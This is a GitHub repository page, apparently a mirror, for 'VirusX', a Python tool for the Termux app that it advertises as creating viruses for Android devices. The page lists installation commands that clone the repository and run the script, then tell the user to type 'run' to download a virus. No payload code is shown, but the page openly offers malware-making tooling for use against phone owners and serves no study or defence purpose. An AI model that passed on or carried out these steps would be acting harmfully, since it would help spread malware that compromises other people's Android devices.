JR-tmhr / VirusX

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

VirusX

VirusX is a tool for Termux to create virus for Android device.

Installation :

First of all install Termux app on your android phone. After that, open Termux
Type below command

$ apt update && apt upgrade
$ apt install git
$ pkg install python
$ git clone https://github.com/TSMaitry/VirusX.git
$ cd VirusX
$ chmod +x VirusX.py
$ python2 VirusX.py

Type "run" to download virus.

To update VirusX Just type:

$ update virusx

About

License:GNU General Public License v3.0


Languages

Language:Python 100.0%